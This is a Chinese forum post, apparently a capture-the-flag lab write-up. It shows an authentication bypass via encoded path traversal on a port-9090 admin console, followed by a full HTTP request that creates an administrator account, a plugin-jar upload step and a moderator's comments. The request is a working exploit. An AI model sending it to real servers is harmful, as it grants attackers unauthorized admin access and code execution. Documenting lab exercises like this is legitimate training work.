首先进入靶场访问
https://域名:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
出现上图所示的日志泄露即可确定漏洞存在
接下来bp抓包,在重发器里填入以下数据包内容:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=xxxxx&username=adm123&name=&email=&password=adm123&passwordConfirm=adm123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: 域名:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=xxxxx; csrf=xxxxx
Connection: close
发送出现如图的响应即为成功添加用户,账号密码都为adm123(注:JSESSIONID和csrf可以通过访问登录界面来获取)
登录后台后,去插件那边上传jar包
然后去服务器-服务器设置运行插件,插件密码123回车
然后去找flag就好了
插件下载
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 300.00 | 0 | 2023-09-06 15:03:13 | 漏洞复现靶场Write Up征集奖励 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
Track-魔方
发表于 2023-9-4
麻烦同学将漏洞POC用代码块包裹起来,并且把格式优化好哈,这样提高可读性,方便他人阅读,奖金池目前还没开放,金币奖励会在奖金池开放之后进行打赏,请同学务必优化一下文章格式提高可读性哈~
评论列表
加载数据中...
Track-魔方
发表于 2023-9-4
对了,麻烦同学将学院靶场的域名等敏感信息打一下码,做一下脱敏处理,感谢[鲜花]
评论列表
加载数据中...